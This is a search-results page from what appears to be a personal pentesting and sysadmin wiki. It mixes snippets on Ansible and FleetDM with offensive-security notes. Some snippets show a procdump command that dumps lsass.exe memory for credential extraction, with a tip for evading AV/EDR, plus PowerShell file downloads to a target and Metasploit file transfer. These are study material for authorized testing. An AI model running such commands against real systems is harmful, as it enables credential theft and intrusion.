Advanced Search
Search Results
166 total results found
Computer Programming
Hydra
Printers
Everyone loves to hate them (and with good reason)
SSH Port Forwarding
Security Considerations Reverse Tunneling This will require you to establish a SSH connection from the foothold back to your attack box. You want to mitigate any potential for this authentication to be used against you Public Key Authentication Say ...
Windows File Downloads
PowerShell [System.Net.WebClient]::new().DownLoadFile(uri, outpath) # Exampe [System.Net.WebClient]::new().DownLoadFile('http://somesite.com/file.txt', 'C:\Users\username\Desktop\file.txt') # Older versions of PS $wc = New-Object System.Net.WebClient $wc.Dow...
VirtualHost Enumeration
VirtualHosts Examples .iframe-container { position: relative; overflow: hidden; width: 100%; /*speficy apsect ratios as fractions*/ aspect-ratio: 4/3; } .responsive-iframe { position: absolute; top: 0; left: 0; bottom: 0; right: 0; widt...
Directory and File Enumeration
Serving Files From a Web Server NGINX /etc/nginx/sites-available/example.com.conf server { listen 80; server_name www.example.com; root /var/www/example.com; index index.html; location / { try_files ...
Parameter and Value Fuzzing
Serving Files From a Web Server NGINX /etc/nginx/sites-available/example.com.conf server { listen 80; server_name www.example.com; root /var/www/example.com; index index.html; location / { try_files ...
Dumping Hashes without Mimikatz
Post-Compromise on Target Lsass Process Dump Sysinternals ProcDump Download ProcDump here # Dump the in-memory data from the process procdump.exe -accepteula -ma lsass.exe out.dmp # If blocked by AV or EDR, try passing the process ID procdump.exe -acc...
Disable Terminal Chime
Linux User Scope Set this line in ~/.inputrc set bell-style none Then, run this command: bind -f ~/.inputrc System Wide Set this line in /etc/inputrc set bell-style none Then, run this command: bind -f /etc/inputrc Vim - User Scope Add this line to ~/.vi...
File Transfer Techniques
TFTP If the target has a TFTP client installed, Metasploit has a TFTP server you can run ad-hoc on your attack box to transfer files https://www.rapid7.com/db/modules/auxiliary/server/tftp/ Attack Box Side # Start Metasploit Framework sudo msfconsole # ...
Defining the Inventory
Defining the Inventory The inventory is everything when it comes to Ansible. Your inventory is your set of hosts to be managed by Ansible. It could be a handful of hosts to a few hundred hosts. The default location for global Ansible configurations is ...
Defining Group Variables and Protecting Secrets
Group Variables Back on Defining the Inventory, you may remember that we broke the inventory up into groups. Groups are a convenient way to break hosts up into units like: Operating system Region Category Using the operating system grouping system, you could...
Example Playbook from Start to Finish
Configuring Ansible Copy the global config to my home directory. That way, I'll keep my Ansible environment how I like it. cp /etc/ansible/ansible.cfg ~/.ansible.cfg # Create a directory to store my inventory mkdir ~/.ansible # Create a file to use fo...
Automating with AWS Secrets Manager
Use Case In this scenario the following is true: You have an Ansible server in AWS You have AWS EC2 instances you'd like to manage as inventory Define a Secrets Naming Scheme You'll want your Ansible server to be able to hit the AWS Secrets Manager ...
Port Forwarding with Chisel
GitHub Download from the Releases Page Usage Requires a copy of the Chisel binary on: The target host The attacker's host. Chisel also supports authenticated proxies to prevent unwanted connections. Chisel Advantages Chisel is a portable bi...
Penetrating Networks via SSH JumpHosts
Click here to view this diagram in a new tab
Enumerating NFS
General Information portmapper and rpcbind run on TCP 111 rpcbind maps RPC services to their listening ports RPC processes notify rpcbind of the following when they start: Ports they're listening on RPC program numbers they expect to serve A clie...
Installing FleetDM Management Server
Create Debian 11 Host apt update && apt upgrade -y && apt install -y sudo gnupg net-tools dnsutils binutils git curl Install MySQL Server Download .deb package from here Run sudo dpkg -i ./package.deb Select MySQL 8 Select OK Run sudo apt update...
Adding FleetDM Hosts via Ansible
Other Install Options Of course, the main focus of this page is to demonstrate the convenience of Ansible with respect to pushing and installing software to a batch of hosts. You don't have to use Ansible to install Fleet DM Osquery agents on your endpoints! ...
Adding Default Queries Library
Set API Context SSH into FleetDM management server Set the API address: fleetctl config set --address https://fleetdm.home.lab:8080 My TLS certificate is self-signed, so I will skip verification: fleetctl config set --tls-skip-verify true Login to the AP...
Penetrating Networks via Chisel Proxies
Click here to see this diagram in a new tab
LdapSearch
When to Use You'll know when you've found a domain controller, because it will have several ports open that clearly distinguish it: PORT STATE SERVICE 53/tcp open domain 88/tcp open kerberos-sec 135/tcp open msrpc 139/tcp open netbios-ssn ...